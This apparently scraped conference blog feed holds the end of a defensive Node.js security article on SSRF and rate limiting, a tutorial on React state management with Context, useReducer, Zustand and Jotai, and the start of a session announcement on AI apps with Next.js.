  • DNS Resolution and IP Blocking: Look up the hostname to IP using dns lookup. Avoid using private networks (10.x.x.x, 172.16.x.x, 192.168.x.x, 127.x.x.x, 169.254.x.x) to avoid disclosing information that can be used to reach resources on the internal network and to prevent SSRF attacks.
  • Preventing Redirects: Set the maxRedirects property of the axios request to 0 to avoid redirect-based bypasses that can allow access to prohibited URLs.
const dns = require('dns').promises;




app.post('/fetch-image', async (req, res) => {

  const imageUrl = req.body.imageUrl;

  

  try {

    // 1. Validate URL format

    const parsedUrl = new URL(imageUrl);

    

    // 2. Only allow http/https protocols

    if (!['http:', 'https:'].includes(parsedUrl.protocol)) {

      return res.status(403).json({ error: 'Protocol not allowed' });

    }

    

    // 3. Resolve hostname to IP

    const { address } = await dns.lookup(parsedUrl.hostname);

    

    // 4. Block private IP ranges

    if (/^(10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.|127\.|169\.254\.)/.test(address)) {

      return res.status(403).json({ error: 'Cannot access internal resources' });

    }

    

    // 5. Now safe to proceed

    const response = await axios.get(imageUrl, { 

      responseType: 'arraybuffer',

      maxRedirects: 0 // Prevent redirect-based bypasses

    });

    

    const imageBuffer = Buffer.from(response.data);

    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);

    res.json({ success: true });

  } catch (error) {

    res.status(400).json({ error: 'Invalid URL or request failed' });

  }

});

Topic 4 – Rate Limiting and DoS Protection

Attackers are known to launch traffic-based attacks on Node.js applications to knock or take over systems:

  1. Distributed Denial of Service (DDoS): Your server is flooded by many requests from so many attackers that legitimate users are unable to access the service.
  2. Brute Force Attempts: Attackers use automated tools to try and login to your application with random combinations of credentials in an attempt to guess the valid authentication credentials.
  3. Scraping and Harvesting: Your application is accessed by bots to make many requests to gather content from your application, affecting performance and data leakage.
  4. API Abuse: API requests to use up resources or to take advantage of the free tiers usually reserved for your application’s APIs.

Note: At the infrastructure level, solutions including AWS WAF, Cloudflare, or Nginx can provide better protection without imposing too much load on your application code. These services provide more sophisticated features like distributed rate limiting, traffic monitoring, and auto-scaling during attacks. But this article focuses only on application-level security policies.

Traffic Management Best Practices

Proper traffic management begins with rate limiting both in the application and infrastructure. This can be done in Node.js using the express-rate-limit middleware package.

const rateLimit = require('express-rate-limit');


const apiLimiter = rateLimit({

  windowMs: 15 * 60 * 1000,

  max: 100, // limit each IP to 100 requests per windowMs

  message: 'Too many requests, please try again later.'

});

app.use('/api/', apiLimiter); // Apply to all API endpoints

app.use('/api/', apiLimiter);

To have a finer level of control, set different rate limits on different endpoints depending on the level of sensitivity and resource requirement of the endpoints.

For instance, authentication endpoints are usually more secure than general content endpoints. Moreover, implement progressive delays for failed attempts and account lockout policies for persistent failures. The library node-rate-limiter-flexible helps enhance features like Redis-based distributed rate limiting for apps deployed on multiple servers.

Mitigating DoS Vulnerabilities

Set request size limits to prevent payload attacks:

app.use(express.json({ limit: '10kb' }));

app.use(express.urlencoded({ extended: true, limit: '10kb' }));

Use helmet for additional HTTP security headers:

const helmet = require('helmet');

app.use(helmet());

Infrastructure-Level Protection

Security is better to approach from the infrastructure-level and use the application-level security as the secondary layer. Options include:

  • Reverse Proxies: Nginx or HAProxy can serve as a barrier, perform rate limiting, and work as a middle layer between your clients and the application.
  • CDNs: Cloudflare or Fastly offers integrated DDoS protection and rate limiting.
  • Cloud Provider Solutions: AWS WAF, Azure Front Door or Google Cloud Armor can be used to monitor and filter traffic.
  • Load Balancers: It can be used to distribute traffic across multiple instances, increasing the load and filter suspicious requests.

Conclusion: Strengthening Node.js Security Layers

Node.js security is an evolving challenge; keeping up with remediation strategies is essential to protect your applications from modern attack vectors. As discussed in detail in this article, attackers are always looking for ways to exploit traffic vulnerabilities. Therefore, a layered approach is necessary. Key points to keep in mind include:

  • In-depth defense is essential: Combine application-level protections such as middleware and request limits are with infrastructure level defenses like reverse proxies, CDN, and WAF to create several layers of protection against traffic-based attacks on Node.js apps.
  • Understand attack patterns: This is only possible if you understand strategies like DDoS attacks, brute force attempts, API abuse, and resource exhaustion.
  • Balance security with usability: Set rate limits properly to prevent malicious traffic without affecting the service quality of legitimate users. Endpoints need different thresholds as per their risk and frequency of use.
  • Implement graduated responses: Step-by-step measures should be taken beginning with slight delays, temporary blockage, and permanent IP blockage for severe attackers as per the frequency and severity of suspicious activities.
  • Continuously monitor and adjust: Security is not set and forget—traffic patterns should be analyzed regularly, rate limits should be checked and altered, and protection mechanisms should be updated to address new threats and application requirements.
  • Leverage existing tools: Some recommended libraries include express-rate-limit, Cloudflare, or AWS WAF instead of developing your own and making potential critical errors during development.
  • Consider distributed applications: For applications deployed on several servers, the distributed rate limiting policy should be implemented using Redis or a similar technology to ensure that the whole infrastructure is uniformly protected.
  • Test your defenses: Regularly conduct penetration testing to verify the effectiveness of your rate limiting and DoS protection measures under realistic attack scenarios.

 

🔍 Frequently Asked Questions (FAQ)

1. What are the main dependency risks in Node.js applications?

Node.js applications often depend on hundreds of third-party packages, increasing their exposure to vulnerabilities. Outdated packages, supply chain compromises, and dependency confusion are among the most critical risks developers must mitigate.

2. How can outdated Node.js packages introduce security vulnerabilities?

Outdated packages may contain known vulnerabilities that attackers can exploit. For example, lodash v4.17.15 has a prototype pollution issue that was fixed in v4.17.19, affecting thousands of dependent packages.

3. What is a supply chain attack in the Node.js ecosystem?

A supply chain attack occurs when malicious code is injected into a trusted dependency, often through social engineering or takeover of an inactive package. This code propagates downstream, compromising applications that rely on the affected package.

4. How can developers prevent dependency confusion in npm?

To prevent dependency confusion, developers should use scoped packages (e.g., @company/package) and configure the publishConfig.registry field to enforce use of internal registries.

5. What are common JWT vulnerabilities in Node.js?

Frequent JWT vulnerabilities include hardcoded secrets, weak signing algorithms, lack of token validation, and insecure token storage. These flaws can lead to unauthorized access and token abuse.

6. How should JWTs be securely implemented in Node.js?

Secure JWT implementations use environment variables for secrets, set expiration and validation claims, and transmit tokens via HttpOnly cookies with strict flags to mitigate XSS and CSRF attacks.

7. What is Server-Side Request Forgery (SSRF) and how can it be exploited in Node.js?

SSRF exploits occur when an attacker manipulates the server into making unauthorized requests, potentially exposing internal services or metadata endpoints. This is often done via user-controlled URLs in APIs or file uploads.

8. How can developers mitigate SSRF in Node.js applications?

Mitigation techniques include domain whitelisting, validating URL protocols, resolving DNS to block private IPs, and disabling redirects in HTTP clients like Axios.

9. What are best practices for rate limiting in Node.js?

Use libraries like express-rate-limit to set per-IP request caps, apply stricter controls on authentication routes, and consider distributed rate limiting via Redis for multi-instance applications.

10.How can infrastructure-level protection enhance Node.js app security?

Infrastructural tools like AWS WAF, Cloudflare, and Nginx offer advanced rate limiting, request filtering, and DDoS protection beyond what app-level middleware can provide.

The post Preventing Dependency Risks and Authentication Flaws in Node.js appeared first on International JavaScript Conference.

]]>
What’s the Best Way to Manage State in React? https://javascript-conference.com/blog/react-state-management-context-zustand-jotai/ Wed, 30 Jul 2025 11:51:42 +0000 https://javascript-conference.com/?p=108242 No topic is as controversial in the React world as state management. Unlike many other topics, there aren’t just two camps. Solutions range from categorically rejecting central state management to implementing state management solutions with React’s built-in tools or lightweight libraries, right through to using heavyweight solutions that determine the entire application’s architecture. Let’s examine several state management approaches and use cases, focusing on lightweight solutions with a low overhead and a limited impact on the overall application.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Let’s start at the very beginning: Why is central state management necessary? This question is not exclusive to React; it arises from modern single-page frameworks’ component-based approaches. In these frameworks, components form the central building blocks of applications. Components can have their own state, which contains either the data to be presented in the browser or the status of UI elements. A frontend application usually contains a large number of small, loosely coupled, and reusable components that form a tree structure. The closer the components are to the root of the tree, the more they are integrated into the application’s structure and business logic.

The leaf components of the tree are usually UI components that take care of the display. The components need data to display. This data usually comes from a backend interface and is loaded by the frontend components. In theory, each component can retrieve its own data, but this results in a large number of requests to the backend. Instead, requests are usually bundled at a central point. The component forming the lowest common denominator, i.e., the parent component for all that need information from this backend interface, is typically the appropriate location for server communication and data management.

And this is precisely the problem leading to central state management. Data from the backend has to be transferred to the components handling the display. This data flow is handled by props, the dynamic attributes of the components. This channel also takes care of write communication: creating, modifying, and deleting data. This isn’t an issue if there are only a few steps between the data source and display, but the longer the path, the greater the coupling of the component tree. Some of the components between the source and the target have nothing to do with the data and simply pass it on. However, this significantly limits reusability. The concept of central state management solves this by eliminating the communication channel using props and giving child components direct access to the information. React’s Context API makes this shortcut possible.

Central state management has many use cases. It’s often used in applications that deal with data record management. This includes applications that manage articles and addresses, fleet management, smart home controls, and learning management applications. The one thing all use cases have in common is that the topic runs through the entire application and different components need to access the data. Central state management minimizes the number of requests, acts as a single source of truth, and handles data synchronization.

Can You Manage Central State in React Without Extra Libraries?

For a long time, the Redux library was the central state management solution, and it’s still popular today. With around 8 million weekly package downloads, the React bindings for Redux are ahead of popular libraries like TanStack Query with 5 million downloads or React Hook Form with 6.5 million downloads. Overall, Redux downloads have been stagnating for some time. This is partly due to Redux’s somewhat undeserved bad reputation. The library has long been accused of causing unnecessary overhead, which prompted Dan Abramov, one of its developers, to write his famous article entitled “You might not need Redux.” Essentially, he says that Redux does involve a certain amount of overhead, but it quickly pays off in large applications. Extensions like the Redux Toolkit also further reduce the extra effort.

The lightest Redux alternative consists of a custom implementation based on React’s Context API and State Hook. The key advantage is that you don’t need any additional libraries. For example, let’s imagine a shopping cart in a web shop. The cart is one of the shop’s central elements and you need to be able to access it from several different places. In the shop, you should be able to add products to the cart using a list. The list shows the number of items currently in the shopping cart. An overview component shows how many products are in the cart and the total value. Both components – the list and the overview – should be independent of each other but always show the latest information.

Without React’s Context API, the only solution is to store shopping cart data in the state of a component that’s a parent to both components. Then, this passes its state to the components using props. This creates a very right coupling between these components. A better solution is based on the Context API. For this, you need the context, which you create with the createContext function. The provider component of the context binds it to the component tree, supplies it with a concrete value, and allows child components to access it. Since React 19, the context object can also be used directly as a provider. This eliminates needing to take a detour with the context’s provider component. With useContext (or, since React 19, the use function), you can access the context. Listing 1 shows the implementation of CartContext.

Listing 1: Implementing CartContext

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useState,
} from 'react';
import { Cart } from './types/Cart';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

The idea behind React’s Context API is that you can store any structure and access it from all child components. The structure can be a simple value like a number or a string, but objects, arrays, and functions are also allowed. In our example, the cart’s state structure is in the context. As usual in React, this is a tuple consisting of the state object, which you can use to read the state, and a function that can change the state. The CartContext can either contain the state structure or the value null. When you call the createContext function, you pass null as the default value. This lets you check if the context provider has been correctly integrated.

The CartProvider component defines the cart state and passes it as a value to the context. It accepts children in the form of a ReactNode object. This lets you integrate the CartProvider component into your component tree and gives all child components access to the context.

The last implementation component is a hook function called useCart. This controls access to the context. The use function provides the context value. If the value is null, it indicates that you should use useCart outside of CartProvider. In this case, the function throws an exception instead of returning the state value.

What does the application code look like when you want to access the state? We’ll use the ListItem component as an example. It accesses the context in both read and write mode. Listing 2 shows the simplified source code for the component.

Listing 2: Accessing the context

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);

  const [cart, setCart] = useCart();

  function addToCart() {
    const quantity = Number(inputRef.current?.value);
    if (quantity) {
      setCart((prev) => ({
        items: [
          ...prev.items.filter((item) => item.id !== product.id),
          {
            ...product,
            quantity,
          },
        ],
      }));
    }
  }

  return (
    <li>
      {product.name}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />
      <button onClick={addToCart}>add</button>
    </li>
  );
};

export default ListItem;

The ListItem component represents each entry in the product list and displays the product name and an input field where you can specify the number of products you want to add to the shopping cart. When you click the button, the component’s addToCart function updates the cart context. This is possible by using the useCart function to access the state of the shopping cart and entering the current product quantity in the input field. Use the setCart function to update the context.

One disadvantage of this implementation is that the ListItem component has to know the CartContext precisely and performs the state update in the callback function of the setCart function. You can solve this by outsourcing this block as a function. Here, the ListItem component can access the functionality as well as every component in the application.

How Do You Synchronize React State with Server Communication?

This solution only works locally in the browser. If you close the window or if a problem occurs, the current shopping cart disappears. You can solve this by applying the actions locally to the state and saving the operations on the server. But this makes implementation a little more complex. When loading the component structure, you must load the currently valid shopping cart from the server and save it to the state. Then, apply each change both on the server side and in the local state. Although this results in some overhead, the advantage is that the current state can be restored at any time, regardless of the browser instance. If you implement the addToCart functionality as a separate hook function, the components remain unaffected by this adjustment.

Listing 3: Implementing the addToCart Functionality

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useEffect,
  useRef,
  useState,
} from 'react';
import { Cart } from './types/Cart';
import { Product } from './types/Product';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  useEffect(() => {
    fetch('http://localhost:3001/cart')
      .then((response) => response.json())
      .then((data) => cart[1](data));
  }, []);

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart(
  product: Product
): [React.RefObject<HTMLInputElement | null>, () => void] {
  const [cart, setCart] = useCart();
  const inputRef = useRef<HTMLInputElement>(null);

  function addToCart() {
    const quantity = Number(inputRef.current?.value);

    if (quantity) {
      const updatedItems = [
        ...cart.items.filter((item) => item.id !== product.id),
        { ...product, quantity },
      ];

      fetch('http://localhost:3001/cart', {
        method: 'PUT',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ id: 1, items: updatedItems }),
      })
        .then((response) => response.json())
        .then((data) => setCart(data));
    }
  }

  return [inputRef, addToCart] as const;
}

The CartProvider component loads the current shopping cart from the server. How users access the shopping cart depends upon the specific interface implementation. The code in the example assumes that the server makes the shopping cart available for the current user via /cart. One potential solution is to differentiate between users using cookies. The second adjustment consists of the useAddToCart function. It receives a product and generates the addToCart function and the ref for the input field. In the addToCart function, the shopping cart is updated locally, sent to the server, and then the local state is set by calling the setCart function. During implementation, we assume the shopping cart is updated via a PUT request to /cart and that this interface returns the updated shopping cart.

Implementation using a combination of context and state is suitable for manageable use cases. It’s lightweight and flexible, but large applications run the risk of the central state becoming chaotic. One possible fix is no longer exposing the function for modifying the state externally, but using the useReducer hook instead.

How Can You Manage React State Using Actions?

React offers another hook for component state management with the useReducer hook. This differs from the more commonly used useState hook and does not provide a function for changing the state. Instead, it returns a tuple of readable state and a dispatch function. When you call the useReducer function, you pass a reducer function whose task is to generate a new state from the previous state and an action object.

The action object describes the change, like adding products to the shopping cart. Actions are usually simple JavaScript objects with the properties type and payload. The type property specifies the type of action, and the payload provides additional information.

The reducer hook is intended for local state management, but you can easily integrate asynchronous server communication. However, it’s recommended that you separate synchronous local operations from asynchronous server-based operations. The reducer should be a pure function and free of side effects. This means that the same inputs always result in the same outputs and the current state is only changed based on the action provided. If you stick to this rule, your code will be clearer and better structured, and error handling is easier. You’ll also be more flexible when it comes to future software extensions. Listing 4 shows an implementation of state management with the useReducer hook.

Listing 4: Using the useReducer-Hooks

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  useContext,
  useEffect,
  useReducer,
} from 'react';
import { Cart, CartItem } from './types/Cart';

const SET_CART = 'setCart';
const ADD_TO_CART = 'addToCartAsync';
const FETCH_CART = 'fetchCart';

type FetchCartAction = {
  type: typeof FETCH_CART;
};

type SetCartAction = {
  type: typeof SET_CART;
  payload: Cart;
};

type AddToCartAsyncAction = {
  type: typeof ADD_TO_CART;
  payload: CartItem;
};

type CartAction = FetchCartAction | SetCartAction | AddToCartAsyncAction;

type CartContextType = [Cart, Dispatch<CartAction>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};

function cartReducer(state: Cart, action: CartAction): Cart {
  switch (action.type) {
    case SET_CART:
      return action.payload;

    default:
      throw new Error(`Unhandled action type: ${action.type}`);
  }
}

function cartMiddleware(dispatch: Dispatch<CartAction>, cart: Cart) {
  return async function (action: CartAction) {
    switch (action.type) {
      case FETCH_CART: {
        const response = await fetch('http://localhost:3001/cart');
        const data = await response.json();
        dispatch({ type: SET_CART, payload: data });
        break;
      }
      case ADD_TO_CART: {
        const response = await fetch('http://localhost:3001/cart', {
          method: 'PUT',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({
            items: [...cart.items, action.payload],
          }),
        });

        const updatedCart = await response.json();
        dispatch({ type: SET_CART, payload: updatedCart });
        break;
      }
      default:
        dispatch(action);
    }
  };
}

export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const [cart, dispatch] = useReducer(cartReducer, { items: [] });
  const enhancedDispatch = cartMiddleware(dispatch, cart);

  useEffect(() => {
    enhancedDispatch({ type: FETCH_CART });
  }, []);

  return (
    <CartContext.Provider value={[cart, enhancedDispatch]}>
      {children}
    </CartContext.Provider>
  );
};

export function useCart() {
  const context = useContext(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart() {
  const [, dispatch] = useCart();

  const addToCart = (item: CartItem) => {
    dispatch({ type: ADD_TO_CART, payload: item });
  };

  return addToCart;
}

The CartProvider component is the starting point for implementation. It holds the context and creates the state using the useReducer hook. It also uses the FETCH_CART action to ensure that the existing shopping cart is loaded from the server. The code has two parts: the reducer itself and a middleware. The reducer takes the form of the cartReducer function and is responsible for the local state. It consists of a switch statement and, in this simple example, supports the SET_CART action, which sets the shopping cart. What’s more interesting though is the cartMiddleware function. This is responsible for the asynchronous actions FETCH_CART and ADD_TO_CART. Unlike the reducer, the middleware cannot access the state directly, but must pass changes to the reducer via actions. To do this, it uses the dispatch function from the useReducer hook. The middleware can also have side effects such as asynchronous server communication. For example, the FETCH_CART action triggers a GET request to the server to retrieve the data from the current shopping cart. Once the data is available, it’s written to the local state using the SET_CART action.

If the middleware isn’t responsible for a received action, it passes it directly to the reducer so that you don’t need to distinguish between the two in the application and can simply use the middleware.

The useCart and useAddToCart functions are the interfaces between the application components and the reducer. Listing 5 shows how to use the reducer implementation in your components.

Listing 5: Integrating the reducer implementation

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart, useAddToCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const [cart] = useCart();
  const addToCart = useAddToCart();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

Read access to the state is still with the useCart function. The useAddToCart function creates a new function that you can pass a new updated item from the shopping cart to. This function generates the necessary action and dispatches it via the middleware.

Both the useState and useReducer approaches require a relatively large amount of boilerplate code around the application’s state management’s business logic. Therefore, libraries exist and “state” is one of the most lightweight.

What Makes Zustand a Scalable State Management Solution?

The Zustand library takes care of the state of an application. The Zustand API is minimalistic, yet the library has all the features you need to centrally manage the state of your application. The stores are the central element, which are created with the create function. They hold the state and provide methods for modification. In your application’s components, you can interact with Zustand’s stores using hook functions. The library lets you perform both synchronous and asynchronous actions and gives the option of storing the state in the browser’s LocalStorage or IndexedDb via middleware. We don’t have to go that far for shopping cart management implementation in our example. It’s enough to load an existing shopping cart from the server and manage it with the list component. It should be possible to access the state from other components, like CartOverview, which shows a summary of the shopping cart.

Before you can use Zustand, you have to install the library with your package manager. You can do this with npm using the command npm add zustand. The library comes with its own type definitions, so you don’t need to install any additional packages to use it in a TypeScript environment.

Create the CartStore outside the components of your application in a separate file. This manages items in the shopping cart. You can control access to the store with the useCartStore function, which gives access to the state and provides methods for adding products and loading the shopping cart from the server. Listing 6 shows the implementation details.

Listing 6: Access to the store

import { create } from 'zustand';
import { CartItem } from './types/Cart';

export type CartStore = {
  cartItems: CartItem[];
  addToCart: (item: CartItem) => Promise<void>;
  loadCart: () => Promise<void>;
};

export const useCartStore = create<CartStore>((set, get) => ({
  cartItems: [],

  addToCart: async (item: CartItem) => {
    set((state) => {
      const existingItemIndex = state.cartItems.findIndex(
        (cartItem) => cartItem.id === item.id
      );

      let updatedCart: CartItem[];
      if (existingItemIndex !== -1) {
        updatedCart = [...state.cartItems];
        updatedCart[existingItemIndex] = item;
      } else {
        updatedCart = [...state.cartItems, item];
      }

      return { cartItems: updatedCart };
    });

    await saveCartToServer(get().cartItems);
  },

  loadCart: async () => {
    const response = await fetch('http://localhost:3001/cart');
    const data: CartItem[] = (await response.json())['items'];
    set({ cartItems: data });
  },
}));

function saveCartToServer(cartItems: CartItem[]): void {
  fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

The create function of state is implemented as a generic function. This means you can pass the state structure to it. TypeScript helps where needed, whether in your development environment or your application’s build process. Pass a callback function to the create function; you can use the get function for read access and the set function for write access to the state. The set function behaves similarly to React’s setState function. You can use the previous state to define a new structure and use it as the return value. The callback function that you pass to create returns an object structure. Then, define the state structure (in our case, this is cartItems) and methods for accessing it like addToCart and loadCart. The addToCart method is implemented as an async method and manipulates the state with the set function. It also uses the helper function saveCartToServer to send the data to the server. After set is executed, the state already has the updated value, so you can read it with get. Always try to treat the state as a single source of truth.

The asynchronous loadCart method is used to initially fill the state with data from the server. You should execute this method once in a central location to make sure that the state is initialized correctly. Listing 7 shows an example using the application’s app component.

Listing 7: Integrating into the app component

import './App.css';
import List from './List';
import CartOverview from './CartOverview';
import { useCartStore } from './cartStore';
import { useEffect } from 'react';

function App() {
  const { loadCart } = useCartStore();

  useEffect(() => {
    loadCart();
  }, []);

  return (
    <>
      <CartOverview />
      <hr />
      <List />
    </>
  );
}

export default App;

Work with state happens in your application’s components, like the ListItem component. Here, you call the useCartStore function and use the cartItems structure to access the data in the store and add new products using the addToCart method. Listing 8 contains the corresponding code.

Listing 8: Integration into the ListItem component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCartStore } from './cartStore';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const { cartItems, addToCart } = useCartStore();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

What’s remarkable about State is that you don’t have to worry about integrating a provider. That’s because State doesn’t rely on React’s Context API to manage global state. One disadvantage is that State is truly global. So you can’t have two identical stores with different data states in your component hierarchy’s subtrees. On the other hand, bypassing the Context API has some performance advantages that make Zustand an interesting alternative.

Why Choose Jotai for React State Management?

Similar to Zustand, Jotai is a lightweight library for state management in React. The library works with small, isolated units called atoms and uses React’s Hook API. Like Zustand, Jotai does not use React’s Context API by default. Individual central state elements and the interfaces to it are significantly smaller and clearly separated from each other. The atom function plays a central role, allowing you to define both the structure and the access functions. This definition takes place outside of the application’s components. Connection between the atoms and components is formed by the useAtom function, which enables you to interact with the central state.

You can install the Jotai library with the command npm add jotai. The difference between it and Zustand is that Jotai works with much finer structures. The atom is the central element here. In a simple instance, you pass the initial value to the atom function when you call it and can use it throughout your application. If you’re using TypeScript, you have the option of defining the type of the atom value as generic.

Jotai provides three different hook functions for accessing the atom from a component. useAtom returns a tuple for read and write access. This tuple is similar in structure to the tuple returned by React’s useState hook. useAtomValue returns only the first part of the tuple, giving you read-only access to the atom. The counterpart is the useSetAtom function, which gives you the setter function for the atom. You can already achieve a lot with this structure, but Jotai also lets you combine atoms. To implement the shopping cart state, you create three atoms in total. One represents the shopping cart, one is for adding products, and one is for loading data from the server. Listing 9 shows the implementation details.

Listing 9: Implementing the atoms

import { atom } from 'jotai';
import { CartItem } from './types/Cart';

const cartItemsAtom = atom<CartItem[]>([]);

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

const addToCartAtom = atom(null, async (get, set, item: CartItem) => {
  const currentCart = get(cartItemsAtom);
  const existingItemIndex = currentCart.findIndex(
    (cartItem) => cartItem.id === item.id
  );

  let updatedCart: CartItem[];
  if (existingItemIndex !== -1) {
    updatedCart = [...currentCart];
    updatedCart[existingItemIndex] = item;
  } else {
    updatedCart = [...currentCart, item];
  }

  set(cartItemsAtom, updatedCart);

  await saveCartToServer(updatedCart);
});

const loadCartAtom = atom(null, async (_get, set) => {
  const response = await fetch('http://localhost:3001/cart');
  const data: CartItem[] = (await response.json())['items'];
  set(cartItemsAtom, data);
});

export { cartItemsAtom, addToCartAtom, loadCartAtom };

You implement your application’s atoms separately from your components. For the cartItemsAtom, call the atom function with an empty array and define the type as a CartItem array. When implementing the business logic, also use the atom function, but pass the value null as the first argument and a function as the second. This creates a derived atom that only allows write access. In the function, you have access to the get and set functions. You can use these to access another atom – in this case, the cartItemsAtom. You can also support additional parameters that are passed when the function is called. For write access with set, pass a reference to the atom and then the updated value. Since the function can be asynchronous, you can easily integrate a side effect like loading data from the server or writing the updated shopping cart. The atoms are integrated into the application components using the Jotai hook functions. Listing 10 shows how this works in the ListItem component example.

Listing 10: Integration in the ListItem Component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useAtom, useAtomValue, useSetAtom } from 'jotai';
import { cartItemsAtom, addToCartAtom } from './cart.atom';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const cartItems = useAtomValue(cartItemsAtom);
  const addToCart = useSetAtom(addToCartAtom);

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

For read access, you can use the useAtomValue function directly, since you use the derived atoms for write operations. The useSetAtom function is used for this. To add a product to the shopping cart, simply call the addToCart function with the new shopping cart item. Jotai takes care of everything else. This is also true when updating all components affected by the atom change.

Conclusion

In this article, you learned about different approaches to state management in a React application. We focused on lightweight approaches that don’t dictate your application’s entire architecture. The first approach used React’s very own interfaces – state or reducers and context. This gives you the maximum amount of freedom and flexibility in your implementation, but you also must take care of all the implementation details yourself.

If you’re willing to sacrifice some of this flexibility and accept an extra dependency in your application, libraries like Zustand or Jotai are a helpful alternative. Both libraries take different approaches. Zustand offers a compact solution that concentrates both the structure and logic in one structure. Jotai, on the other hand, works with smaller units and lets you derive or combine these units, making your application more flexible and individual parts easier to exchange. Ultimately, the solution you choose depends upon the use case and your personal preferences.

🔍 Frequently Asked Questions (FAQ)

1. What are common reasons for implementing central state management in React?

Central state management is often necessary due to the component-based architecture of single-page applications. It enables efficient data sharing between deeply nested components without passing props through intermediate layers.

2. How does React’s Context API facilitate central state management?

The Context API allows React components to access shared state directly, bypassing the need to pass data through the component tree. This improves reusability and reduces coupling between components.

3. What are typical use cases for central state management in frontend applications?

Use cases include applications involving data record management such as e-commerce carts, address books, fleet management, and smart home systems. These scenarios require consistent, shared data access across multiple components.

4. How can you implement state management using only React without external libraries?

You can use a combination of useState and the Context API to manage and distribute state throughout the component tree. This lightweight method avoids additional dependencies but may require more boilerplate.

5. What are the advantages and limitations of Redux for state management?

Redux offers powerful state control and is suitable for large-scale applications, especially with tools like Redux Toolkit. However, it can introduce unnecessary overhead for smaller projects.

6. How does the useReducer hook enhance state logic separation?

The useReducer hook enables state manipulation through pure functions and action objects, improving code clarity and testability. It also allows the introduction of middleware for handling asynchronous actions.

7. What benefits does Zustand offer over React’s built-in state tools?

Zustand simplifies state logic by consolidating state and actions into centralized stores, avoiding the need for context providers. It supports asynchronous operations and optional local persistence via middleware.

8. How does Jotai manage state differently than Zustand?

Jotai uses atomic state units called atoms and provides fine-grained state control with minimal coupling. It emphasizes modularity and composability, which can lead to cleaner, more scalable code structures.

9. When should you choose Zustand or Jotai over native React state solutions?

Libraries like Zustand and Jotai are ideal when you want to reduce boilerplate, avoid prop drilling, and need a lightweight but scalable alternative to Redux. The choice depends on project complexity and team preferences.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman https://javascript-conference.com/blog/ai-nextjs-nir-kaufman-workshop/ Wed, 09 Jul 2025 16:26:32 +0000 https://javascript-conference.com/?p=108186 In today’s fast-evolving web development landscape, integrating AI into your apps isn't just a trend—it's becoming a necessity. In this hands-on session, Nir Kaufman walks developers through building AI-driven applications using the Next.js framework. Whether you're exploring generative AI, large language models (LLMs), or building smarter interfaces, this session provides the perfect foundation.

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
The session dives deep into practical ways to incorporate AI into web applications using Next.js, covering everything from LLM fundamentals to real-world coding demos.

